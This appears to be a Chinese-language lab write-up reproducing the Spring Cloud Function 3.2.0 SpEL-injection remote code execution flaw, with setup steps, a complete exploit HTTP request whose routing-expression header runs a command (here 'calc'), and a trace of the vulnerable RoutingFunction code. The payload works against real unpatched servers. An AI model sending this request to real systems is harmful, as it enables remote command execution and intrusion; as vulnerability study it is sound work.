一、环境搭建
https://codeload.github.com/spring-cloud/spring-cloud-function/zip/refs/tags/v3.2.0
下载当前的压缩包直接用IDEA 打开
spring-cloud-function-samples/function-sample-pojo
就可以执行运行环境
进行访问
二、修改配置文件的RCE方式
然后随意路由
三、默认配置文件下的RCE
POST /functionRouter HTTP/1.1
Host: 192.168.66.101:8080
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc")
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
test
四、代码分析
从TestRoutingFunctionTests.java
好像是调用apply 函数。传递了Message 类型的input
那么从这里打断点
实际上触发的代码块为:
function = this.functionFromExpression((String)message.getHeaders().get("spring.cloud.function.routing-expression"), message);
往下更进
private FunctionInvocationWrapper functionFromExpression(String routingExpression, Object input) {
Expression expression = this.spelParser.parseExpression(routingExpression);
String functionName = (String)expression.getValue(this.evalContext, input, String.class);
Assert.hasText(functionName, "Failed to resolve function name based on routing expression '" + this.functionProperties.getRoutingExpression() + "'");
FunctionInvocationWrapper function = (FunctionInvocationWrapper)this.functionCatalog.lookup(functionName);
Assert.notNull(function, "Failed to lookup function to route to based on the expression '" + this.functionProperties.getRoutingExpression() + "' whcih resolved to '" + functionName + "' function name.");
if (logger.isInfoEnabled()) {
logger.info("Resolved function from provided [routing-expression] " + routingExpression);
}
return function;
}
参考:
https://mp.weixin.qq.com/s/ssHcLC72wZqzt-ei_ZoLwg
https://wx.zsxq.com/dweb2/index/topic_detail/184254458222452
